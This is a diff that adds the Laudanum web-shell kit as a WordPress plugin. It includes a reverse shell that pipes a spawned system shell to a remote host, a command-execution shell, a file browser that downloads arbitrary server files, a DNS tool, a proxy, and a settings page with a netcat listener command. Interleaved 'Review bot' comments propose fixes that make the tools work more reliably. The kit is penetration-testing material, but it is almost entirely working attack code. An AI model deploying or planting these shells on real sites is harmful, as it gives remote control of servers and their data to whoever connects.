+*** +***************************************************************************** */ + + if(!class_exists("WP_Laudanum")) + { + class WP_Laudanum + { + + public function __construct() + { + add_action('admin_menu', array(&$this, 'add_menu')); + } + + public function __activate() + { + + } + + public function __deactivate() + { + + } + + public function add_menu() + { + add_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page')); + } + + public function plugin_settings_page() + { + if(!current_user_can('manage_options')) + { + wp_die(__('You do not have sufficient permissions to access this page.')); + } + + include(sprintf("%s/templates/settings.php", dirname(__FILE__))); + } + } + + register_activation_hook(__FILE__, array('WP_Laudanum', 'activate')); + register_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate')); + + $wp_laudanum = new WP_Laudanum(); + + if(isset($wp_laudanum)) { + function plugin_settings_link($links) + { + $settings_link = 'Settings'; + array_unshift($links, $settings_link); + return $links; + } + + $plugin = plugin_basename(__FILE__); + add_filter("plugin_action_links_$plugin", 'plugin_settings_link'); + } + + } + + + + ?> \ No newline at end of file diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/dns.php b/Web-Shells/laudanum-1.0/wordpress/templates/dns.php new file mode 100644 index 00000000..7107431b --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/dns.php 
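Review bot: The lifecycle hooks in wordpress/laudanum.php point at methods that do not exist: `register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'))` and the matching deactivation call name `activate` and `deactivate`, while the class defines instance methods `__activate()` and `__deactivate()`. Because the callbacks are passed as class-name arrays they also have to be static, so declaring `public static function activate()` and `public static function deactivate()` is what makes the registrations resolve. Separately, `plugin_settings_link` is declared as an unprefixed global function, which risks a redeclaration fatal if another plugin defines the same name; a prefixed name such as `wp_laudanum_settings_link` avoids that.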
@@ -0,0 +1,144 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides access to DNS on the system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP DNS Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum PHP DNS Access + + + + + + +

DNS Query 0.1

+
+
+ DNS Lookup: +

Query: + Type: + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo "Auth NS = "; + print_r($authns); + echo "Additional = "; + print_r($addtl); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/file.php b/Web-Shells/laudanum-1.0/wordpress/templates/file.php new file mode 100644 index 00000000..d80a2ae0 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/file.php 
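Review bot: `error_handler()` concatenates `$errstr` and `$errfile` straight into the HTML passed to `die()`, and the result block prints `print_r($result)`, `print_r($authns)` and `print_r($addtl)` without encoding as far as the visible lines show. DNS answers are controlled by whoever operates the queried zone, so they should reach the operator's browser as text, e.g. `echo htmlspecialchars(print_r($result, true));`, with the same wrapping on the two values in the error page. The handler is also declared under the global name `error_handler` here and in host.php, killnc.php and proxy.php, while file.php and shell.php use `wpl_error_handler`; using the prefixed name throughout prevents a redeclaration error if two templates are ever loaded in one request. The comment about `chdir()` "below" appears to be carried over from the shell template and does not match the visible code.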
@@ -0,0 +1,182 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim Medin +*** +*** 12/28/2013 - updated by Jason Gillam - fixed parent folder. +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP File Browser + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +//set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; +$file = isset($_GET["file"]) ? $_GET["file"] : ""; + +if ($file != "") { + if(file_exists($file)) { + + $s = split("/", $file); + $filename = $s[count($s) - 1]; + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($file)); + header("Content-Disposition: attachment; filename=\"".$filename."\""); + readfile($file); + die(); + } +} +?> + + + + Laudanum File Browser + + + + + + +

Laudanum File Browser 0.1

+Home
+ +Directory listing of / "; +$breadcrumb = '/'; +foreach ($dirs as $d) { + if ($d != '') { + $breadcrumb .= $d . "/"; + echo "$d/ "; + } +} +echo ""; + +// translate .. to a real dir +$parentdir = ""; +for ($i = 0; $i < count($dirs) - 2; $i++) { + $parentdir .= $dirs[$i] . "/"; +} + +echo ""; +echo ""; +echo ""; + +//get listing, separate into directories and files +$listingfiles = array(); +$listingdirs = array(); + +if ($handle = @opendir($curdir)) { + while ($o = readdir($handle)) { + if ($o == "." || $o == "..") continue; + if (@filetype($curdir . $o) == "dir") { + $listingdirs[] = $o . "/"; + } + else { + $listingfiles[] = $o; + } + } + + @natcasesort($listingdirs); + @natcasesort($listingfiles); + + //display directories + foreach ($listingdirs as $f) { + echo ""; + } + + //display files + foreach ($listingfiles as $f) { + echo ""; + } +} +else { + echo ""; +} +?> +
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/host.php b/Web-Shells/laudanum-1.0/wordpress/templates/host.php new file mode 100644 index 00000000..aff4ac3d --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/host.php 
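Review bot: The directory listing concatenates each entry name `$f` into the table markup with no encoding, so a file name on the host under test that contains markup is interpreted by the viewer's browser rather than displayed. Entry names are untrusted data for whoever opens this page and should go through `htmlspecialchars($f, ENT_QUOTES)` before being echoed; the same applies to the breadcrumb values `$d`. Separately, `//set_error_handler('error_handler');` is commented out and names a function this file does not define (the handler here is `wpl_error_handler`), which leaves the handler above it as dead code. It should be registered under its real name or removed together with the handler.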
@@ -0,0 +1,126 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a host lookup by ip address. +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum Host Lookup + + + + + + +

Host Lookup 0.1

+
+
+ Host Lookup: +

IP: + + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php b/Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php new file mode 100644 index 00000000..fe27d70c --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php 
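Review bot: `$type` is still read from `$_POST['type']` with a `DNS_ANY` default although the visible form only has an IP field and the output only prints `$result`, so the assignment looks like a leftover from dns.php and should be removed or documented. The lookup code itself is not visible in this hunk; if `$query` is passed on unchecked, I would validate it first with `filter_var($query, FILTER_VALIDATE_IP)` and print the result through `htmlspecialchars(print_r($result, true))`. The footer credits Tim Medin while the header comment says the file was written by Jason Gillam.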
@@ -0,0 +1,61 @@
+
+***
+*** Copyright 2014 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
+*** by someone other than the person who uploaded Laudanum. This file should be included
+*** in other Laudanum tools and not called directly.
+*** Written by Jason Gillam
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA 02111-1307, USA.
+***
+***************************************************************************** */
+
+
+// ***************** Config entries below ***********************
+// IPs are enterable as individual addresses TODO: add CIDR support
+$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1");
+
+
+# *********** No editable content below this line **************
+
+$wpl_allowed = 0;
+foreach ($wpl_allowedIPs as $IP) {
+ if ($_SERVER["REMOTE_ADDR"] == $IP)
+ $wpl_allowed = 1;
+}
+
+if ($wpl_allowed == 0) {
+ header("HTTP/1.0 404 Not Found");
+ die();
+}
+
+?>
\ No newline at end of file
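Review bot: The shipped `$wpl_allowedIPs` list already contains `127.0.0.1` and two private addresses, so a copy deployed without editing does not fail closed. If the web server sits behind a local reverse proxy or load balancer, `$_SERVER["REMOTE_ADDR"]` is the proxy's address and every request can match the loopback entry. I would ship the list empty, `$wpl_allowedIPs = array();`, so every template answers 404 until the tester's address is filled in, and replace the loop with a strict lookup, `$wpl_allowed = in_array($_SERVER["REMOTE_ADDR"], $wpl_allowedIPs, true) ? 1 : 0;`. As far as this diff shows, the address filter is the only gate on the templates, so the comment above the array should say so and state that the files must be removed when the engagement ends.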
diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/killnc.php b/Web-Shells/laudanum-1.0/wordpress/templates/killnc.php
new file mode 100644
index 00000000..0c985872
--- /dev/null
+++ b/Web-Shells/laudanum-1.0/wordpress/templates/killnc.php
@@ -0,0 +1,103 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file attempts to kill all netcat processes spawned by the current user. +*** This may be useful in cases where a reverse shell attempt has gone wrong. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + + +?> + + + + Laudanum Kill nc + + + + +

Kill nc 0.1

+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php b/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php new file mode 100755 index 00000000..c2cf80d9 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php 
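Review bot: The fatal-error page in this file still carries the title `Laudanum PHP Hostname by IP Lookup`, copied from host.php, so an error raised here identifies itself as a different tool; it should read `Laudanum Kill nc` like the page title further down. The handler comment refers to `chdir()` "below", which does not appear in the visible part of this hunk, and the footer credits Tim Medin while the header comment says the file was written by Jason Gillam. These copied strings make it harder to tell from a saved page or log which template produced it, so I would correct all three.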
@@ -0,0 +1,194 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + 
+fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/proxy.php b/Web-Shells/laudanum-1.0/wordpress/templates/proxy.php new file mode 100644 index 00000000..c82b110f --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/proxy.php 
@@ -0,0 +1,336 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file acts as a browser-based proxy. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page +// figure out how to reuse sessionid from the remote site + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Proxy + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. 
http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute 
reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - hard linked + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - relative reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + return $r; +} + +/* Initialize some variables we need again and again. */ +$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; +if ($url == "") { + $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; +} + +if ($url == "") { +?> + + + + Laudanum PHP Proxy + + + + + + +

Laudanum PHP Proxy

+ +
+ + +
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/settings.php b/Web-Shells/laudanum-1.0/wordpress/templates/settings.php new file mode 100644 index 00000000..06f9817f --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/settings.php @@ -0,0 +1,67 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a convenient menu of Laudanum tools from a Word Press settings +*** page. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ +?> + + +
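Review bot: `removeheader()` returns `$headers` only from inside the matching branch, so when the named header is absent the function falls off the end and the caller receives `null` instead of the header array; add `return $headers;` after the `foreach`. The same function builds its pattern from `$header` without `preg_quote()`. `rewrite()` concatenates `$_SERVER["PHP_SELF"]` into the rewritten markup unencoded, so the request path can end up as markup in the page shown to the operator; `htmlspecialchars($_SERVER["PHP_SELF"], ENT_QUOTES)` closes that. `getcontenttype()` and `getcontentencoding()` have the same implicit `null` return when no header matches and deserve a one-line comment saying so.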
+

Laudanum Tools

+ + * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" +
+ \ No newline at end of file diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/shell.php b/Web-Shells/laudanum-1.0/wordpress/templates/shell.php new file mode 100644 index 00000000..1ba24458 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/shell.php 
@@ -0,0 +1,389 @@
+
+*** Tim Medin
+***
+*** Copyright 2014 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides shell access to the system. It is built based on the 2.1
+*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
+***
+***
+*** Updated by Tim Medin
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA 02111-1307, USA.
+***
+***************************************************************************** */
+
+
+include 'ipcheck.php';
+
+
+/* This error handler will turn all notices, warnings, and errors into fatal
+ * errors, unless they have been suppressed with the @-operator. */
+function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
+ /* The @-opertor (used with chdir() below) temporarely makes
+ * error_reporting() return zero, and we don't want to die in that case.
+ * We do note the error in the output, though. */
+ if (error_reporting() == 0) {
+ $_SESSION['output'] .= $errstr . "\n";
+ } else {
+ die('
+
+
+ Laudanum PHP Shell Access
+
+
+

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net. +
+
+
+');
+ }
+}
+
+// set_error_handler('wpl_error_handler');
+
+
+function logout() {
+ $_SESSION = array('authenticated' => false);
+ if (isset($_COOKIE[session_name()]))
+ setcookie(session_name(), '', time()-42000, '/');
+ session_destroy();
+}
+
+
+function wpl_stripslashes_deep($value) {
+ if (is_array($value))
+ return array_map('stripslashes_deep', $value);
+ else
+ return stripslashes($value);
+}
+
+if (get_magic_quotes_gpc())
+ $_POST = stripslashes_deep($_POST);
+
+/* Initialize some variables we need again and again. */
+//$username = isset($_POST['username']) ? $_POST['username'] : '';
+//$password = isset($_POST['password']) ? $_POST['password'] : '';
+//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
+
+$command = isset($_POST['command']) ? $_POST['command'] : '';
+$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
+$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
+
+
+///* Default settings --- these settings should always be set to something. */
+//$default_settings = array('home-directory' => '.');
+
+///* Merge settings. */
+//$ini['settings'] = array_merge($default_settings, $ini['settings']);
+
+
+session_start();
+
+/* Delete the session data if the user requested a logout. This leaves the
+ * session cookie at the user, but this is not important since we
+ * authenticates on $_SESSION['authenticated']. */
